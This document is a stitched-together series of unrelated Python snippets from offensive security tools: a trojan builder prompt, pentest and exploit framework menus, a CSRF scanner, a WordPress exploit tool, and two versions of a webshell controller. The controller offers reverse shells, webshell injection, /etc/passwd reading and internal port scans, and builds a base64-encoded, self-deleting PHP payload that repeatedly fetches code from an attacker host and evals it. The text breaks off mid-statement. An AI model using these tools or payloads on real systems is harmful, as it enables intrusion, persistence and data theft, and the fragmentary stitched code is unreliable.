def main(): banner() help() while True: cmd = raw_input(str(Log.console("asist@AWD: ")).strip('None')) if cmd == "make" or cmd == 'm': make_trojan() elif cmd == "h" or cmd == '?': help() elif cmd == 'exit' or cmd == 'e': break else: print "help(?)"
def __init__(self): self.main = main() self.io = io() self.tip = tip() self.execute = execute() self.loader = loader() self.config = config() self.badges = badges() self.banner = banner() self.storage = storage()
def __init__(self): self.io = io() self.tip = tip() self.execute = execute() self.loader = loader() self.config = config() self.badges = badges() self.banner = banner() self.storage = storage() self.modules = modules() self.exceptions = exceptions()
def __init__(self): self.io = io() self.tip = tip() self.jobs = jobs() self.execute = execute() self.loader = loader() self.config = config() self.badges = badges() self.banner = banner() self.colors = colors() self.local_storage = local_storage() self.modules = modules() self.exceptions = exceptions() self.history = self.config.path_config['base_paths']['history_path']
def main(): # Clear up the terminal screen subprocess.call("clear", shell=True) print(banner()) print() # Check the validity of user entered subreddit and assign its value to sub sub = check_validity() # Category menu print("""%s[+] Wubba Lubba dub-dub! Select a Category: 1) Top 2) New 3) Hot 4) Rising 5) Exit """ % (green)) # Loop until valid category is selected while (True): ch = int(input("%sEnter your choice: %s" % (green, reset))) print() if ch == 1 or ch == 2 or ch == 3 or ch == 4 or ch == 5: if ch == 5: sys.exit() else: break else: print("%s[-] Invalid input detected please enter a valid input!" % (red)) print() # Call function to display image urls fetched for respective sub and category fetch_choices(ch, sub)
from modules.morse import morse_decode from modules.utf import utf_decode from modules.nato import convert_nato from modules.octal import decode_octal from modules.netbios import decode_netbios from modules.binary import decode_binary from modules.reverse import reverse_string from modules.decimal import decode_decimal from modules.bacon import decode_bacon from modules import cracker except ModuleNotFoundError: message("!", "Please Run 'install.sh'!") exit(1) banner(0.0005) while True: try: CommandComplete() cmd = input(red("crypted") + gray(" » ")) if cmd != "": if cmd.split()[0] == "rainbow-crack": message("+", "Coming soon...") # RAINBOW TABLES if cmd.split()[0] == "rainbow-init": message("+", "Coming soon...") """
def main(): banner() if len(sys.argv) != 4: show_help() exit(1) url = sys.argv[1] method = sys.argv[2] password = sys.argv[3] webshell = WebShell(url, method, password) LOCAL_COMMAND_FLAG = True if not webshell.working: Log.error("The webshell cannot work...") exit(2) Log.info("recording this webshell to the log file...") with open("Webshell.txt", "a+") as f: log_content = "%s => %s => %s\n" % (url, method, password) f.write(log_content) main_help() while True: Log.context("sniper") context_fresh = raw_input("=>") or "h" context = string.lower(context_fresh) if context == "h" or context == "help" or context == "?": main_help() elif context == "sh" or context == "shell": shell = Shell(webshell) shell.interactive() elif context == "rsh" or context == "rshell": Log.info("socat file:`tty`,raw,echo=0 tcp-l:8888") ip = raw_input("[IP] : (%s)" % (get_ip_address())) or get_ip_address() port = raw_input("[PORT] : (8888)") or "8888" Log.info("Starting reverse shell (%s:%s)" % (ip, port)) webshell.reverse_shell(ip, port) elif context == "p" or context == "print": webshell.print_info() elif context == "pv" or context == "php_version": Log.success(webshell.get_php_version()) elif context == "kv" or context == "kernel_version": Log.success(webshell.get_kernel_version()) elif context == "c" or context == "config": Log.info("Detacting config files...") webshell.get_config_file() elif context == "fwd": webshell.get_writable_directory() elif context == "gdf": webshell.get_disabled_functions() elif context == "fwpf": webshell.get_writable_php_file() elif context == "fsb": webshell.get_suid_binaries() elif context == "setr": LOCAL_COMMAND_FLAG = False elif context == "setl": LOCAL_COMMAND_FLAG = True elif context == "dla": path = raw_input( "Input path (%s) : " % webshell.webroot) or (webshell.webroot) args = raw_input("Please custom find args (%s) : " % (" -size 500k")) or " -size 500k" Log.info("Using command : find %s %s" % (path, args)) webshell.download_advanced(path, args) elif context == "dl": path = raw_input( "Input path (%s) : " % webshell.webroot) or (webshell.webroot) if not webshell.file_exists(path): Log.error("The file [%s] is not exists on the server!" % (path)) continue if webshell.is_directory(path): Log.info( "The target file is a directory, using recursion download..." ) filename_filter = raw_input("Input --name '%s' : " % ("*.php")) or "*.php" webshell.download_recursion(path, filename_filter) else: #filename = path.split("/")[-1] #local_path = raw_input("Input local path (%s) to save the file : " % filename) or (filename) # Log.info("Using root path : [%s] to save!" % (local_path)) Log.info( "The target file is a single file, starting download...") webshell.download(path, path) elif context == "ps": hosts = raw_input( "Input hosts (192.168.1.1/24) : ") or "192.168.1.1/24" if not "/" in hosts: Log.error( "Please use the format IP/MASK , if want to scan a single host , set MASK=32" ) continue ports = raw_input("Input ports (21,22,25,80,443,445,3389)" ) or "21,22,25,80,443,445,3389" webshell.port_scan(hosts, ports) elif context == "aiw": default_filename = random_string(0x10, string.letters) default_password = md5( md5("%s%s%s" % (salt, default_filename, salt))) filename = raw_input("Filename (.%s.php): " % (default_filename)) or (".%s.php" % (default_filename)) password = raw_input("Password (%s): " % (default_password)) or ("%s" % (default_password)) webshell.auto_inject_webshell(filename, password) elif context == "aimw": default_filename = random_string(0x10, string.letters) default_password = md5( md5("%s%s%s" % (salt, default_filename, salt))) filename = raw_input("Filename (.%s.php): " % (default_filename)) or (".%s.php" % (default_filename)) password = raw_input("Password (%s): " % (default_password)) or ("%s" % (default_password)) webshell.auto_inject_memery_webshell(filename, password) elif context == "fr": Log.info("Starting flag reaper...") webserver_host = raw_input("[IP] (%s) : " % (get_ip_address())) or get_ip_address() webserver_port = int(raw_input("[PORT] (80) : ") or "80") filename = ".%s.php" % (random_string(0x10, string.letters)) file_content = "ignore_user_abort(true);set_time_limit(0);unlink(__FILE__);while(true){$code = file_get_contents('http://%s:%d/code.txt');eval($code);sleep(5);}" % ( webserver_host, webserver_port) Log.info("Temp memory phpfile : %s" % (file_content)) Log.info("Encoding phpfile...") file_content = '<?php unlink(__FILE__);eval(base64_decode("%s"));?>' % ( file_content.encode("base64").replace("\n", "")) Log.info("Final memory phpfile : %s" % (file_content)) result = webshell.auto_inject_flag_reaper(filename, file_content) if result: Log.success( "Please check the web server(%s:%d) log to get your flag!" % (webserver_host, webserver_port)) Log.info("Tips : tail -f /var/log/apache2/access.log") else: Log.error("Starting flag reaper failed!") elif context == "r" or context == "read": filepath = raw_input( "Input file path (/etc/passwd) : ") or "/etc/passwd" webshell.read_file(filepath) elif context == "db" or context == "database": ip = raw_input("IP (127.0.0.1): ") or "127.0.0.1" username = raw_input("Username (root): ") or "root" password = raw_input("Password (root): ") or "root" Log.info("Creating connection by [%s:%s] to [%s]..." % (username, password, ip)) mysql_connection = Mysql(webshell, ip, username, password) if not mysql_connection.function: Log.error("The target server cannot support mysql!") continue if not mysql_connection.connection_flag: Log.error("Connection failed!") continue Log.success("Connection success!") if mysql_connection.function != "": Log.success("Entering database server interactive mode...") mysql_connection.interactive() else: Log.error("No supported database function!") elif context == "q" or context == "quit" or context == "exit": Log.info("Quiting...") break else: Log.error("Unsupported function!") if LOCAL_COMMAND_FLAG == True: Log.info("Executing command on localhost...") os.system(context_fresh) else: Log.info("Executing command on target server...") webshell.auto_exec_print(context_fresh)
yaml_name,cookies,HD,fRe,paths,Method,expression,datas,md5_path,md5 = parse.get_yaml("fingerprint/"+y) if yaml_name.split("-")[-1] != "md5" and "/" in paths and Method == "get" and fRe == False: if eval(expression): print(" "+yaml_name + ": "+url) wFile(yaml_name + ": "+url) if type_F == "first": fileL.remove(url) if type_F == "second" and sec_flag == False: sec_flag = True return if __name__ == '__main__': os.system('') banner.banner() if len(sys.argv) != 4: print('\n') print("Usage: python3 Frog-Fp.py win/linux -tL urls.txt") print("Usage: python3 Frog-Fp.py win/linux -dL ips.txt") exit() else: parser = argparse.ArgumentParser() parser.add_argument('os', help='win/linux') parser.add_argument('-tL', help='urls', default='') parser.add_argument('-dL', help='domains', default='') args = parser.parse_args() #根据系统设置二进制文件名 getsys(args.os)
def handle_options(options: dict): if options["version"]: exit(banner.banner())
data = { 'qbase64': base64.b64encode(query_str), 'email': self.email, 'key': self.key, 'size': size, 'fields': fields } req = requests.get(url, params=data, timeout=10) return req.json() except requests.exceptions.ConnectionError: error_msg = {"error": True, "errmsg": "Connect error"} return error_msg if __name__ == '__main__': banner() ips = [] fofa = FofaAPI(email, key) try: result = fofa.get_data(cmd.get("query"), cmd.get("size"), "host,ip,title") except: logger.INFO("search error!!") for host, ip, title in result['results']: if cmd.get("cidr"): ips.append(ip2cidr(ip)) logger.INFO("Host: {0} IP: {1} Title: [{2}]".format(host, ip, title) + " is FOUND!") num = num + 1 if cmd.get("cidr"):
def main(): while True: try: PTF = raw_input("Pentest>> ") if PTF == 'use modules/exploits': core.menu.exploits() main() elif PTF == 'use modules/scanners': core.menu.scan() main() elif PTF =='use modules/password': core.menu.pas1() main() elif PTF == 'use modules/post': core.menu.post() main() elif PTF =='use modules/listener': core.menu.listener() main() elif PTF =='use modules/exploitdb': core.menu.exploit_db() main() elif PTF =='use modules/tools': core.menu.tools() main() elif PTF =='shell': core.exploit.commands() main() elif PTF == 'show modules': core.help.modules() main() elif PTF =='ipconfig': core.exploit.ip1() main() elif PTF =='show options': core.help.help() main() elif PTF =='update': core.exploit.update() main() elif PTF =='about': core.banner.info() main() elif PTF =='credits': core.banner.credits() main() elif PTF =='banner': clean(),banner(),ptf(),main() elif PTF =='clear': core.menu.exploit.clean() main() elif PTF =='exit': core.banner.exits() exit() else: print "Wrong Command => ", PTF print ""+N+""+B+"["+R+"!"+B+"] "+N+"Please enter 'show options'" main() except(KeyboardInterrupt): print("\n"+R+"[*] (Ctrl + C ) Detected, Trying To Exit ...\n" ) time.sleep(2) print(""+G+"[*] Thank You For Using Pentest Framework =)\n" ) time.sleep(3) exit()
def Engine(): # lets begin it! os.system('clear') # Clear shit from terminal :p banner() # Print the banner banabout() # The second banner web, fld = inputin() # Take the input form1 = testFormx1() # Get the form 1 ready form2 = testFormx2() # Get the form 2 ready # For the cookies that we encounter during requests... Cookie0 = http.cookiejar.CookieJar() # First as User1 Cookie1 = http.cookiejar.CookieJar() # Then as User2 resp1 = build_opener(HTTPCookieProcessor(Cookie0)) # Process cookies resp2 = build_opener(HTTPCookieProcessor(Cookie1)) # Process cookies actionDone = [] # init to the done stuff csrf = '' # no token initialise / invalid token ref_detect = 0x00 # Null Char Flag ori_detect = 0x00 # Null Char Flags form = Debugger.Form_Debugger() # init to the form parser+token generator bs1 = BeautifulSoup(form1).findAll( 'form', action=True)[0] # make sure the stuff works properly bs2 = BeautifulSoup(form2).findAll('form', action=True)[0] # same as above init1 = web # First init resp1.open(init1) # Makes request as User2 resp2.open(init1) # Make request as User1 # Now there are 2 different modes of scanning and crawling here. # 1st -> Testing a single endpoint without the --crawl flag. # 2nd -> Testing all endpoints with the --crawl flag. try: # Implementing the first mode. [NO CRAWL] if not CRAWL_SITE: url = web response = Get(url).text try: verbout(O, 'Trying to parse response...') soup = BeautifulSoup(response) # Parser init except HTMLParser.HTMLParseError: verbout(R, 'BeautifulSoup Error: ' + url) i = 0 # Init user number if REFERER_ORIGIN_CHECKS: # Referer Based Checks if True... verbout( O, 'Checking endpoint request validation via ' + color.GREY + 'Referer' + color.END + ' Checks...') if Referer(url): ref_detect = 0x01 verbout(O, 'Confirming the vulnerability...') # We have finished with Referer Based Checks, lets go for Origin Based Ones... verbout( O, 'Confirming endpoint request validation via ' + color.GREY + 'Origin' + color.END + ' Checks...') if Origin(url): ori_detect = 0x01 # Now lets get the forms... verbout( O, 'Retrieving all forms on ' + color.GREY + url + color.END + '...') for m in Debugger.getAllForms( soup): # iterating over all forms extracted verbout(O, 'Testing form:\n' + color.CYAN) formPrettify(m.prettify()) verbout('', '') FORMS_TESTED.append('(i) ' + url + ':\n\n' + m.prettify() + '\n') try: if m['action']: pass except KeyError: m['action'] = '/' + url.rsplit('/', 1)[1] ErrorLogger(url, 'No standard form "action".') action = Parser.buildAction( url, m['action']) # get all forms which have 'action' attribute if not action in actionDone and action != '': # if url returned is not a null value nor duplicate... # If form submission is kept to True if FORM_SUBMISSION: try: # NOTE: Slow connections may cause read timeouts which may result in AttributeError # So the idea here is tp make requests pretending to be 3 different users. # Now a series of requests will be targeted against the site with different # identities. Refer to XSRFProbe wiki for more info. # # NOTE: Slow connections may cause read timeouts which may result in AttributeError result, genpoc = form.prepareFormInputs( m) # prepare inputs as user 1 r1 = Post( url, action, result ) # make request with token values generated as user1 result, genpoc = form.prepareFormInputs( m) # prepare inputs as user 2 r2 = Post( url, action, result ) # again make request with token values generated as user2 # Go for cookie based checks if COOKIE_BASED: Cookie(url, r1) # Go for token based entropy checks... try: if m['name']: query, token = Entropy( result, url, r1.headers, m.prettify(), m['action'], m['name']) except KeyError: query, token = Entropy(result, url, r1.headers, m.prettify(), m['action']) # Now its time to detect the encoding type (if any) of the Anti-CSRF token. fnd, detct = Encoding(token) if fnd == 0x01 and detct: VulnLogger( url, 'Token is a string encoded value which can be probably decrypted.', '[i] Encoding: ' + detct) else: NovulLogger( url, 'Anti-CSRF token is not a string encoded value.' ) # Go for token parameter tamper checks. if (query and token): txor = Tamper(url, action, result, r2.text, query, token) o2 = resp2.open( url).read() # make request as user2 try: form2 = Debugger.getAllForms(BeautifulSoup( o2))[i] # user2 gets his form except IndexError: verbout(R, 'Form Index Error') ErrorLogger(url, 'Form Index Error.') continue # Making sure program won't end here (dirty fix :( ) verbout(GR, 'Preparing form inputs...') contents2, genpoc = form.prepareFormInputs( form2) # prepare for form 3 as user3 r3 = Post( url, action, contents2 ) # make request as user3 with user3's form if (POST_BASED) and ((not query) or (txor)): try: if m['name']: PostBased(url, r1.text, r2.text, r3.text, m['action'], result, genpoc, m.prettify(), m['name']) except KeyError: PostBased(url, r1.text, r2.text, r3.text, m['action'], result, genpoc, m.prettify()) else: print( color.GREEN + ' [+] The form was requested with a Anti-CSRF token.' ) print(color.GREEN + ' [+] Endpoint ' + color.BG + ' NOT VULNERABLE ' + color.END + color.GREEN + ' to POST-Based CSRF Attacks!') NovulLogger( url, 'Not vulnerable to POST-Based CSRF Attacks.' ) except HTTPError as msg: # if runtime exception... verbout(R, 'Exception : ' + msg.__str__()) # again exception :( ErrorLogger(url, msg) actionDone.append(action) # add the stuff done i += 1 # Increase user iteration else: # Implementing the 2nd mode [CRAWLING AND SCANNING]. verbout(GR, "Initializing crawling and scanning...") crawler = Crawler.Handler(init1, resp1) # Init to the Crawler handler while crawler.noinit(): # Until 0 urls left url = next(crawler) # Go for next! print(C + 'Testing :> ' + color.CYAN + url) # Display what url its crawling try: soup = crawler.process(fld) # Start the parser if not soup: continue # Making sure not to end the program yet... i = 0 # Set count = 0 (user number 0, which will be subsequently incremented) if REFERER_ORIGIN_CHECKS: # Referer Based Checks if True... verbout( O, 'Checking endpoint request validation via ' + color.GREY + 'Referer' + color.END + ' Checks...') if Referer(url): ref_detect = 0x01 verbout(O, 'Confirming the vulnerability...') # We have finished with Referer Based Checks, lets go for Origin Based Ones... verbout( O, 'Confirming endpoint request validation via ' + color.GREY + 'Origin' + color.END + ' Checks...') if Origin(url): ori_detect = 0x01 # Now lets get the forms... verbout( O, 'Retrieving all forms on ' + color.GREY + url + color.END + '...') for m in Debugger.getAllForms( soup): # iterating over all forms extracted FORMS_TESTED.append('(i) ' + url + ':\n\n' + m.prettify() + '\n') try: if m['action']: pass except KeyError: m['action'] = '/' + url.rsplit('/', 1)[1] ErrorLogger(url, 'No standard "action" attribute.') action = Parser.buildAction( url, m['action'] ) # get all forms which have 'action' attribute if not action in actionDone and action != '': # if url returned is not a null value nor duplicate... # If form submission is kept to True if FORM_SUBMISSION: try: result, genpoc = form.prepareFormInputs( m) # prepare inputs as user 1 r1 = Post( url, action, result ) # make request with token values generated as user1 result, genpoc = form.prepareFormInputs( m) # prepare inputs as user 2 r2 = Post( url, action, result ) # again make request with token values generated as user2 if COOKIE_BASED: Cookie(url, r1) # Go for token based entropy checks... try: if m['name']: query, token = Entropy( result, url, r1.headers, m.prettify(), m['action'], m['name']) except KeyError: query, token = Entropy( result, url, r1.headers, m.prettify(), m['action']) ErrorLogger( url, 'No standard form "name".') # Now its time to detect the encoding type (if any) of the Anti-CSRF token. fnd, detct = Encoding(token) if fnd == 0x01 and detct: VulnLogger( url, 'String encoded token value. Token might be decrypted.', '[i] Encoding: ' + detct) else: NovulLogger( url, 'Anti-CSRF token is not a string encoded value.' ) # Go for token parameter tamper checks. if (query and token): txor = Tamper(url, action, result, r2.text, query, token) o2 = resp2.open( url).read() # make request as user2 try: form2 = Debugger.getAllForms( BeautifulSoup(o2))[ i] # user2 gets his form except IndexError: verbout(R, 'Form Index Error') ErrorLogger(url, 'Form Index Error.') continue # making sure program won't end here (dirty fix :( ) verbout(GR, 'Preparing form inputs...') contents2, genpoc = form.prepareFormInputs( form2) # prepare for form 3 as user3 r3 = Post( url, action, contents2 ) # make request as user3 with user3's form if (POST_BASED) and ((query == '') or (txor == True)): try: if m['name']: PostBased( url, r1.text, r2.text, r3.text, m['action'], result, genpoc, m.prettify(), m['name']) except KeyError: PostBased(url, r1.text, r2.text, r3.text, m['action'], result, genpoc, m.prettify()) else: print( color.GREEN + ' [+] The form was requested with a Anti-CSRF token.' ) print(color.GREEN + ' [+] Endpoint ' + color.BG + ' NOT VULNERABLE ' + color.END + color.GREEN + ' to P0ST-Based CSRF Attacks!') NovulLogger( url, 'Not vulnerable to POST-Based CSRF Attacks.' ) except HTTPError as msg: # if runtime exception... verbout( color.RED, ' [-] Exception : ' + color.END + msg.__str__()) # again exception :( ErrorLogger(url, msg) actionDone.append(action) # add the stuff done i += 1 # Increase user iteration except URLError as e: # if again... verbout(R, 'Exception at : ' + url) # again exception -_- time.sleep(0.4) verbout(O, 'Moving on...') ErrorLogger(url, e) continue # make sure it doesn't stop at exceptions # This error usually happens when some sites are protected by some load balancer # example Cloudflare. These domains return a 403 forbidden response in various # contexts. For example when making reverse DNS queries. except HTTPError as e: if str(e.code) == '403': verbout(R, 'HTTP Authentication Error!') verbout(R, 'Error Code : ' + O + str(e.code)) ErrorLogger(url, e) quit() GetLogger( ) # The scanning has finished, so now we can log out all the links ;) print('\n' + G + "Scan completed!" + '\n') Analysis() # For Post Scan Analysis except KeyboardInterrupt as e: # Incase user wants to exit :') (while crawling) verbout(R, 'User Interrupt!') time.sleep(1.5) Analysis() # For Post scan Analysis print(R + 'Aborted!') # say goodbye ErrorLogger('KeyBoard Interrupt', 'Aborted') GetLogger( ) # The scanning has interrupted, so now we can log out all the links ;) quit()
def main(): signal.signal(signal.SIGINT, signal_handler) signal.signal(signal.SIGTERM, signal_handler) banner() LOCAL_COMMAND_FLAG = True CONTEXT = reset_context() while True: command = (raw_input("[%s]=> " % (color.red(CONTEXT))) or "help") if command == "h" or command == "help" or command == "?": main_help() elif command == "version": Log.info("Version: 0.0.1") elif command == "show": print "%s" % (color.purple("------\t\t------")) print "%s" % (color.purple("Vendor\t\tModule")) print "%s" % (color.purple("------\t\t------")) exploit_path = "./exploit/" vendors = os.listdir(exploit_path) for vendor in vendors: full_path = exploit_path + vendor if os.path.isdir(full_path): # Log.info("%s" % ("-" * 0x20)) # Log.info("Vendor: %s" % (vendor)) exploit_files = os.listdir(full_path) number = 0 for exploit_file in exploit_files: if exploit_file.endswith( ".py") and exploit_file != "__init__.py": # Log.info("%s => exploit.%s.%s" % (exploit_file, vendor, exploit_file.replace(".py", ""))) if len(vendor) > 8: print "%s" % (color.cyan( "%s\t%s" % (vendor, exploit_file.replace(".py", "")))) else: print "%s" % (color.cyan( "%s\t\t%s" % (vendor, exploit_file.replace(".py", "")))) number += 1 # Log.info("%d exploits" % (number)) elif command.startswith("use "): module_name = command.split(" ")[1] Log.info("Loading module: %s" % (module_name)) try: module = importlib.import_module(module_name) except Exception as e: Log.error(str(e)) continue CONTEXT = module_name exploit = module.Exploit() exploit.show_info() Log.info("%s" % ("-" * 0x40)) exploit.show_options() while True: module_command = (raw_input("[%s]=> " % (color.red(CONTEXT))) or "help") if module_command == "help": main_help() continue if module_command.startswith("set "): if len(module_command.split(" ")) == 3: key = module_command.split(" ")[1] value = module_command.split(" ")[2] exploit.set_config(key, value) else: Log.error("Check your input!") Log.info("Example: \n\tset [KEY] [VALUE]") elif module_command == "options": exploit.show_options() elif module_command == "info": exploit.show_info() elif module_command == "exploit": try: exploit.exploit() except Exception as e: Log.error(str(e)) elif module_command == "quit" or module_command == "q" or module_command == "exit" or module_command == "back": break else: main_help() CONTEXT = reset_context() elif command == "q" or command == "quit" or command == "exit": Log.info("Quiting...") break else: Log.error("Unsupported function!") if LOCAL_COMMAND_FLAG == True: Log.info("Executing command on localhost...") os.system(command)
def Engine(): # lets begin it! os.system('clear') # Clear shit from terminal :p banner() # Print the banner banabout() # The second banner web = inputin() # Take the input form1 = form10() # Get the form 1 ready form2 = form20() # Get the form 2 ready # For the cookies that we encounter during requests... Cookie0 = http.cookiejar.CookieJar() # First as User1 Cookie1 = http.cookiejar.CookieJar() # Then as User2 resp1 = build_opener(HTTPCookieProcessor(Cookie0)) # Process cookies resp2 = build_opener(HTTPCookieProcessor(Cookie1)) # Process cookies actionDone = [] # init to the done stuff csrf = '' # no token initialise / invalid token ref_detect = 0x00 # Null Char ori_detect = 0x00 init1 = web # get the starting page form = Debugger.Form_Debugger() # init to the form parser+token generator bs1 = BeautifulSoup(form1).findAll( 'form', action=True)[0] # make sure the stuff works properly bs2 = BeautifulSoup(form2).findAll('form', action=True)[0] # same as above action = init1 # First init resp1.open(action) # Makes request as User2 resp2.open(action) # Make request as User1 verbout(GR, "Initializing crawling and scanning...") crawler = Crawler.Handler(init1, resp1) # Init to the Crawler handler try: while crawler.noinit(): # Until 0 urls left url = next(crawler) # Go for next! print(C + 'Crawling :> ' + color.CYAN + url) # Display what url its crawling try: soup = crawler.process(web) # Start the parser if not soup: continue # Making sure not to end the program yet... i = 0 # Set count = 0 if REFERER_ORIGIN_CHECKS: # Referer Based Checks if True... verbout( O, 'Checking endpoint request validation via ' + color.GREY + 'Referer' + color.END + ' Checks...') if Referer(url): ref_detect = 0x01 verbout(O, 'Confirming the vulnerability...') # We have finished with Referer Based Checks, lets go for Origin Based Ones... verbout( O, 'Confirming endpoint request validation via ' + color.GREY + 'Origin' + color.END + ' Checks...') if Origin(url): ori_detect = 0x01 if COOKIE_BASED: Cookie(url) # Now lets get the forms... verbout( O, 'Retrieving all forms on ' + color.GREY + url + color.END + '...') for m in Debugger.getAllForms( soup): # iterating over all forms extracted action = Parser.buildAction( url, m['action'] ) # get all forms which have 'action' attribute if not action in actionDone and action != '': # if url returned is not a null value nor duplicate... # If form submission is kept to True if FORM_SUBMISSION: try: result = form.prepareFormInputs( m) # prepare inputs r1 = Post( url, action, result ).text # make request with token values generated as user1 result = form.prepareFormInputs( m) # prepare the input types r2 = Post( url, action, result ).text # again make request with token values generated as user2 # Go for token based entropy checks... try: if m['name']: query, token = Entropy( result, url, m['action'], m['name']) except KeyError: query, token = Entropy( result, url, m['action']) # Go for token parameter tamper checks. if (query and token): Tamper(url, action, result, r2, query, token) o2 = resp2.open( url).read() # make request as user2 try: form2 = Debugger.getAllForms( BeautifulSoup(o2))[ i] # user2 gets his form except IndexError: verbout(R, 'Form Error') continue # making sure program won't end here (dirty fix :( ) verbout(GR, 'Preparing form inputs...') contents2 = form.prepareFormInputs( form2) # prepare for form 2 as user2 r3 = Post( url, action, contents2 ).text # make request as user3 with user2's form if POST_BASED: try: if m['name']: PostBased(url, r1, r2, r3, m['action'], result, m['name']) except KeyError: PostBased(url, r1, r2, r3, m['action'], result) except HTTPError as msg: # if runtime exception... verbout(R, 'Exception : ' + msg.__str__()) # again exception :( actionDone.append(action) # add the stuff done i += 1 # Increase user iteration except URLError: # if again... verbout(R, 'Exception at : ' + url) # again exception -_- time.sleep(0.4) verbout(O, 'Moving on...') continue # make sure it doesn't stop print('\n' + G + "Scan completed!" + '\n') Analysis() # For Post Scan Analysis # This error usually happens when some sites are protected by some load balancer # example Cloudflare. These domains return a 403 forbidden response in various # contexts. For example when making reverse DNS queries. except HTTPError as e: if str(e.code) == '403': verbout(R, 'HTTP Authentication Error!') verbout(R, 'Error Code : ' + O + str(e.code)) quit() except KeyboardInterrupt: # incase user wants to exit ;-; (while crawling) verbout(R, 'User Interrupt!') time.sleep(1.5) Analysis() # For Post scan Analysis print(R + 'Aborted!') # say goodbye quit()
def debby_anggraini(): # banner and auto complete banner() complete(array) # loop forever :v while True: try: an = raw_input('Eazy_> ') wibu = an.split() # parse argument manual XD arg = toxic(wibu, '-u,-t,-s,-n,-f') # if an == '' or len(wibu) == 0: if not wibu: pass # help menu elif wibu[0] != '-h' and '-h' in wibu or wibu[ 0] != '--help' and '--help' in wibu: help_menu(wibu[0]) # advanced nmap commands elif wibu[0] == 'nmap': debby_lovlov(arg['-t'], arg['-u']) # webkit modules elif wibu[0] in webkit_dict: # dirty hack XD for i in webkit_dict: if wibu[0] == i: hackertarget(webkit_dict[i], arg['-u']) elif wibu[0] == 'geoip': geoip(arg['-u']) elif wibu[0] == 'mxrecords': mx(arg['-u']) elif wibu[0] == 'domain_age': domage(arg['-u']) elif wibu[0] == 'whatcms': cms(arg['-u']) elif wibu[0] == 'subdomain': subdo(arg['-u']) elif wibu[0] == 'honeypot': honey(arg['-u']) elif wibu[0] == 'joom_sql_scan': j_sql(arg['-u']) elif wibu[0] == 'xss_scan': xss(arg['-u']) elif wibu[0] == 'rce_scan': rcevuln(arg['-u']) # exploit module elif wibu[0] == 'wpscan': wpscan(arg['-u']) elif wibu[0] == 'user_pro': check_vuln(arg['-u']) elif wibu[0] == 'wp_user': user_scan(arg['-u'], arg['-n']) elif wibu[0] == 'wp_sym_exp': exploit_wp(arg['-u'], arg['-f']) elif wibu[0] == 'simple_slide_show_exp': sss_ex(arg['-u'], arg['-f']) elif wibu[0] == 'product_page_advert_exp': ppa_ex(arg['-u'], arg['-f']) elif wibu[0] == 'home_page_advert_exp': hpa_ex(arg['-u'], arg['-f']) # scanner module elif wibu[0] == 'lfi_scan': lfiscan(arg['-u']) elif wibu[0] == 'hashbuster': hash_scan() elif wibu[0] == 'shell': shell(arg['-u']) elif wibu[0] == 'dirscan': # dir dir(arg['-u']) elif wibu[0] == 'dork' and wibu[1] != None: msg = an.replace(wibu[0] + ' ', '').replace('-s ', '').replace('-s', '') if not msg: usage('dork') elif '-s' in an: dorking(msg, 'scan') else: dorking(msg, ) # brute force module elif wibu[0] == 'adfin': adfin(arg['-u']) elif wibu[0] == 'upload': upload(arg['-u']) # encryption modules elif wibu[0] in encdec_array: # bad coding :" if '--enc' in wibu or '-e' in wibu: ende(wibu[0], 'enc') elif '--dec' in wibu or '-d' in wibu: ende(wibu[0], 'dec') else: usage(wibu[0]) elif wibu[0] in hash_array: hash(wibu[0], arg['-s']) # others elif wibu[0] == ':!': if len(wibu) == 1: printf('sh: commands not found', 2) os.system(an[2:]) elif wibu[0] in ['q', 'quit']: printf('[!] bye bye..') break elif an == 'show modules' or an == 'help': show_modules() elif an == 'show all modules' or an == 'help more': show_modules('wibu bau bawang') else: printf('%s: not found.' % wibu[0], 2) # end # usage except (IndexError, KeyError): usage(wibu[0]) # user interrupt except KeyboardInterrupt: printf('\n\rError: Interrupt..') # handle error except (requests.exceptions.ConnectionError): printf('Connection Error..', 2) except Exception as e: printf('%s' % str(e), 2)
def main(): banner() if len(sys.argv) != 4: show_help() exit(1) url = sys.argv[1] method = sys.argv[2] password = sys.argv[3] webshell = WebShell(url, method, password) LOCAL_COMMAND_FLAG = True if not webshell.working: Log.error("The webshell cannot work...") exit(2) main_help() while True: Log.context("sniper") context_fresh = raw_input("=>") or "h" context = string.lower(context_fresh) if context == "h" or context == "help" or context == "?": main_help() elif context == "sh" or context == "shell": shell = Shell(webshell) shell.interactive() elif context == "rsh" or context == "rshell": Log.info("socat file:`tty`,raw,echo=0 tcp-l:8888") ip = raw_input("[IP] : (%s)" % (get_ip_address())) or get_ip_address() port = raw_input("[PORT] : (8888)") or "8888" Log.info("Starting reverse shell (%s:%s)" % (ip, port)) webshell.reverse_shell(ip, port) elif context == "p" or context == "print": webshell.print_info() elif context == "pv" or context == "php_version": webshell.get_php_version() elif context == "kv" or context == "kernel_version": webshell.get_kernel_version() elif context == "c" or context == "config": Log.info("Detacting config files...") webshell.get_config_file() elif context == "fwd": webshell.get_writable_directory() elif context == "gdf": webshell.get_disabled_functions() elif context == "fwpf": webshell.get_writable_php_file() elif context == "fsb": webshell.get_suid_binaries() elif context == "setr": LOCAL_COMMAND_FLAG = False elif context == "setl": LOCAL_COMMAND_FLAG = True elif context == "dla": path = raw_input( "Input path (%s) : " % webshell.webroot) or (webshell.webroot) args = raw_input("Please custom find args (%s) : " % (" -size 500k")) or " -size 500k" Log.info("Using command : find %s %s" % (path, args)) webshell.download_advanced(path, args) elif context == "dl": path = raw_input( "Input path (%s) : " % webshell.webroot) or (webshell.webroot) if not webshell.file_exists(path): Log.error("The file [%s] is not exists on the server!" % (path)) continue if webshell.is_directory(path): Log.info( "The target file is a directory, using recursion download..." ) filename_filter = raw_input("Input --name '%s' : " % ("*.php")) or "*.php" webshell.download_recursion(path, filename_filter) else: #filename = path.split("/")[-1] #local_path = raw_input("Input local path (%s) to save the file : " % filename) or (filename) # Log.info("Using root path : [%s] to save!" % (local_path)) Log.info( "The target file is a single file, starting download...") webshell.download(path, path) elif context == "ps": hosts = raw_input( "Input hosts (192.168.1.1/24) : ") or "192.168.1.1/24" if not "/" in hosts: Log.error( "Please use the format IP/MASK , if want to scan a single host , set MASK=32" ) continue ports = raw_input("Input ports (21,22,25,80,443,445,3389)" ) or "21,22,25,80,443,445,3389" webshell.port_scan(hosts, ports) elif context == "aiw": default = random_string(0x10, string.letters) filename = raw_input("Filename (.%s.php): " % (default)) or (".%s.php" % (default)) password = raw_input("Password (%s): " % (default)) or ("%s" % (default)) webshell.auto_inject_webshell(filename, password) elif context == "r" or context == "read": filepath = raw_input( "Input file path (/etc/passwd) : ") or "/etc/passwd" webshell.read_file(filepath) elif context == 